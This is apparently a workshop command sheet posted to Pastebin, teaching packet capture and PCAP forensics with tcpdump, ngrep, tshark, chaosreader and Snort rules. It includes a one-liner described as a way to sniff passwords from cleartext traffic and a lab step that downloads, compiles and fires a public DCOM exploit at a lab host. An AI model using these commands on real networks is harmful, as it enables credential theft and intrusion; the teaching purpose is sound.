API tools faq
paste
Advertisement
joemccray

Packet Analysis/Network Forensics

joemccray
Aug 10th, 2016
2,119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.99 KB | None | 0 0
raw download clone embed print report
  1. ##########
  2. # VMWare #
  3. ##########
  4. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  5.  
  6. - http://www.vmware.com/ap/products/player.html
  7.  
  8.  
  9. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  10.  
  11.  
  12.  
  13. #########################
  14. # Class Virtual Machine #
  15. #########################
  16.  
  17.  
  18. Here is the VMWare virtual machine for the class:
  19.  
  20. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
  21. user: infosecaddicts
  22. pass: infosecaddicts
  23.  
  24.  
  25. #################
  26. # PCAP Analysis #
  27. #################
  28. ---------------------------Type This-----------------------------------
  29. cd ~/Desktop/
  30.  
  31. mkdir suspiciouspcap/
  32.  
  33. cd suspiciouspcap/
  34.  
  35. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  36.  
  37. wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
  38.  
  39.  
  40. perl chaosreader.pl suspicious-time.pcap
  41.  
  42. firefox index.html
  43.  
  44. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  45.  
  46. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  47.  
  48.  
  49. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  50. ------------------------------------------------------------------------
  51.  
  52.  
  53.  
  54. ####################
  55. # Intro to TCPDump #
  56. ####################
  57. ---------------------------Type This-----------------------------------
  58. sudo apt-get install tcpdump
  59.  
  60.  
  61.  
  62. Basic sniffing
  63. --------------
  64. ---------------------------Type This-----------------------------------
  65. sudo tcpdump -n
  66.  
  67.  
  68. Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy
  69. ---------------------------Type This-----------------------------------
  70. sudo tcpdump -v -n
  71.  
  72.  
  73.  
  74. Getting the ethernet header (link layer headers)
  75. ------------------------------------------------
  76. In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
  77. ---------------------------Type This-----------------------------------
  78. sudo tcpdump -vv -n -e
  79. ------------------------------------------------------------------------
  80.  
  81. Sniffing a particular interface
  82. -------------------------------
  83. In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.
  84. ---------------------------Type This-----------------------------------
  85. sudo tcpdump -D
  86. ------------------------------------------------------------------------
  87.  
  88. Filtering packets using expressions - Selecting protocols
  89. ---------------------------------------------------------
  90. ---------------------------Type This-----------------------------------
  91. $ sudo tcpdump -n tcp
  92. ------------------------------------------------------------------------
  93.  
  94. Particular host or port
  95. -----------------------
  96. Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
  97. ---------------------------Type This-----------------------------------
  98. $ sudo tcpdump -n 'src 192.168.1.101'
  99. ------------------------------------------------------------------------
  100.  
  101. Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.
  102. ---------------------------Type This-----------------------------------
  103. $ sudo tcpdump -n 'udp and dst port 53'
  104. ------------------------------------------------------------------------
  105.  
  106. To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
  107. ---------------------------Type This-----------------------------------
  108. $ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
  109. ------------------------------------------------------------------------
  110.  
  111. Search the network traffic using grep
  112.  
  113. Grep can be used along with tcpdump to search the network traffic. Here is a very simple example
  114. ---------------------------Type This-----------------------------------
  115. $ sudo tcpdump -n -A | grep -e 'POST'
  116. ------------------------------------------------------------------------
  117.  
  118. So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
  119. Here is quick example to sniff passwords using egrep
  120.  
  121. ---------------------------Type This-----------------------------------
  122. tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
  123. ------------------------------------------------------------------------
  124.  
  125.  
  126.  
  127. #########
  128. # NGrep #
  129. #########
  130.  
  131. Install ngrep on Ubuntu
  132. ---------------------------Type This-----------------------------------
  133. $ sudo apt-get install ngrep
  134. ------------------------------------------------------------------------
  135.  
  136. Search network traffic for string "User-Agent: "
  137. ---------------------------Type This-----------------------------------
  138. $ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
  139. ------------------------------------------------------------------------
  140. In the above command :
  141. a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only TCP packet with port number 80
  142. b) The d option specifies the interface to sniff. eth0 in this case.
  143. c) "User-Agent: " is the string to search for. All packets that have that string are displayed.
  144.  
  145. 2. Search network packets for GET or POST requests :
  146. ---------------------------Type This-----------------------------------
  147. $ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
  148. ------------------------------------------------------------------------
  149. The l option makes the output buffered and the q option is for quiet ( Be quiet; don't output any information other than packet headers and their payloads (if relevant) ).
  150.  
  151. 3. ngrep without any options would simply capture all packets.
  152. ---------------------------Type This-----------------------------------
  153. $ sudo ngrep
  154. ------------------------------------------------------------------------
  155.  
  156. Reference:
  157. https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
  158. ---------------------------Type This-----------------------------------
  159. $ sudo ngrep -d eth0 -n 3
  160.  
  161. $ sudo ngrep -d any port 25
  162. ------------------------------------------------------------------------
  163.  
  164. This will let you monitor all activity crossing source or destination port 25
  165. (SMTP).
  166. ---------------------------Type This-----------------------------------
  167. $ sudo ngrep -wi -d wlan0 'user|pass' port 6667
  168.  
  169. $ sudo ngrep -wi -d any 'user|pass' port 21
  170. ------------------------------------------------------------------------
  171.  
  172.  
  173.  
  174.  
  175.  
  176. #############################
  177. # PCAP Analysis with tshark #
  178. #############################
  179. ---------------------------Type This-----------------------------------
  180. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  181.  
  182.  
  183. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  184.  
  185.  
  186. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  187.  
  188.  
  189. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  190.  
  191.  
  192. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  193.  
  194.  
  195. tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  196.  
  197. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  198.  
  199. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  200.  
  201. tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  202.  
  203. tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  204.  
  205.  
  206. whois rapidshare.com.eyu32.ru
  207.  
  208. whois sploitme.com.cn
  209.  
  210.  
  211. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  212.  
  213. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  214.  
  215. tshark -r suspicious-time.pcap -qz http_req,tree
  216.  
  217. tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  218.  
  219. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  220.  
  221.  
  222.  
  223. ######################################
  224. # PCAP Analysis with forensicPCAP.py #
  225. ######################################
  226. ---------------------------Type This-----------------------------------
  227. cd ~/Desktop/suspiciouspcap/
  228.  
  229. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  230.  
  231. sudo pip install cmd2==0.7.9
  232.  
  233.  
  234. python forensicPCAP.py suspicious-time.pcap
  235. ------------------------------------------------------------------------
  236.  
  237.  
  238. ---------------------------Type This-----------------------------------
  239. ForPCAP >>> help
  240. ------------------------------------------------------------------------
  241.  
  242. Prints stats about PCAP
  243. ---------------------------Type This-----------------------------------
  244. ForPCAP >>> stat
  245. ------------------------------------------------------------------------
  246.  
  247. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  248. ---------------------------Type This-----------------------------------
  249. ForPCAP >>> dns
  250.  
  251. ForPCAP >>> show
  252. ------------------------------------------------------------------------
  253.  
  254. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  255. ---------------------------Type This-----------------------------------
  256. ForPCAP >>> dstports
  257.  
  258. ForPCAP >>> show
  259. ---------------------------Type This-----------------------------------
  260.  
  261. Prints the number of ip source and store them.
  262. ---------------------------Type This-----------------------------------
  263. ForPCAP >>> ipsrc
  264.  
  265. ForPCAP >>> show
  266. ------------------------------------------------------------------------
  267.  
  268. Prints the number of web's requests and store them
  269. ForPCAP >>> web
  270.  
  271. ForPCAP >>> show
  272. ------------------------------------------------------------------------
  273.  
  274.  
  275. Prints the number of mail's requests and store them
  276. ---------------------------Type This-----------------------------------
  277. ForPCAP >>> mail
  278.  
  279. ForPCAP >>> show
  280. ------------------------------------------------------------------------
  281.  
  282.  
  283.  
  284.  
  285.  
  286. #############################
  287. # Understanding Snort rules #
  288. #############################
  289. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  290.  
  291. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  292.  
  293. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  294.  
  295. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  296.  
  297. Field 5: Traffic Direction (->)
  298.  
  299. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  300.  
  301. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  302.  
  303. Field 8: MSG - what is actually displayed on the analysts machine
  304.  
  305.  
  306. Let's look at 2 simple rules
  307. ----------------------------------------------------------------------------------
  308. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
  309. bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
  310. content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
  311. 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
  312. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  313.  
  314. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
  315. attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
  316. depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
  317. 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
  318. distance:0; within:1; content:”|0b|”; distance:1; within:1; \
  319. byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  320. 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  321. sid:2193; rev:1;)
  322. ----------------------------------------------------------------------------------
  323.  
  324.  
  325.  
  326. From your Linux machine ping your Windows machine
  327. ---------------------------Type This-----------------------------------
  328. ping 192.168.150.1
  329. -----------------------------------------------------------------------
  330.  
  331.  
  332. Start wireshark and let's create some simple filters:
  333.  
  334. Filter 1:
  335. ---------------------------Type This-----------------------------------
  336. ip.addr==192.168.150.1
  337. -----------------------------------------------------------------------
  338.  
  339. Filter 2:
  340. ---------------------------Type This-----------------------------------
  341. ip.addr==192.168.150.1 && icmp
  342. -----------------------------------------------------------------------
  343.  
  344.  
  345. Filter 3:
  346. ---------------------------Type This-----------------------------------
  347. ip.addr==192.168.150.1 && !(tcp.port==22)
  348. -----------------------------------------------------------------------
  349. Now stop your capture and restart it (make sure you keep the filter)
  350.  
  351.  
  352.  
  353.  
  354. Back to your Linux machine:
  355. [ CTRL-C ] - to stop your ping
  356. ---------------------------Type This-----------------------------------
  357. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  358.  
  359.  
  360. gcc -o exploit oc192-dcom.c
  361.  
  362. ./exploit
  363.  
  364.  
  365. ./exploit -d 192.168.150.1 -t 0
  366. -----------------------------------------------------------------------
  367.  
  368.  
  369.  
  370. Now go back to WireShark and stop the capture.
  371.  
  372.  
  373.  
  374. ###############################################
  375. # Packet Analysis/Network Forensics Challenge #
  376. ###############################################
  377.  
  378. In order to receive your certificate of proficiency you must complete all of the tasks covered in the Packet Analysis/Network Forensics pastebin (http://pastebin.com/SwgnkAhQ).
  379.  
  380. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-PA-NF-Challenge.docx)
  381.  
  382.  
  383.  
  384.  
  385. IMPORTANT NOTE:
  386. Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and kasheia-at-strategicsec-.-com) by Sunday October 23rd at midnight EST.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!